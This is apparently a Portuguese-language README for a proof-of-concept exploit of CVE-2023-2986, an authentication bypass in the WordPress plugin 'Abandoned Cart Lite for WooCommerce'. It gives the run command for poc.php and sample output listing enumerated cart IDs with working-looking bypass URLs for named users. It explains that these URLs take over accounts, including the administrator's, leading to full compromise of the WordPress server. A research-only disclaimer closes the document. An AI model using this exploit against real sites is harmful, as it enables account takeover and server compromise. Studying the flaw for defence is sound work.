
Prova de Conceito para a vulnerabilidade CVE-2023-2986 no Plugin 'Abandoned Cart Lite for WooCommerce' no WordPress
Prova de Conceito para a vulnerabilidade CVE-2023-2986 no plugin 'Abandoned Cart Lite for WooCommerce' no WordPress
version <= 5.14.2version <= 5.15.15.15.05.15.25.15.2sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5
Inserir a URL no navegador dará acesso à conta do usuário respectivo. Se o próprio usuário administrador do WordPress tiver uma entrada, isso dará acesso ao console de administração, levando ao comprometimento total do servidor WordPress.
Esta Prova de Conceito (POC) foi criada puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usada para atacar sistemas, exceto quando explicitamente autorizado. O autor não é responsável por qualquer uso indevido da POC. Use com responsabilidade.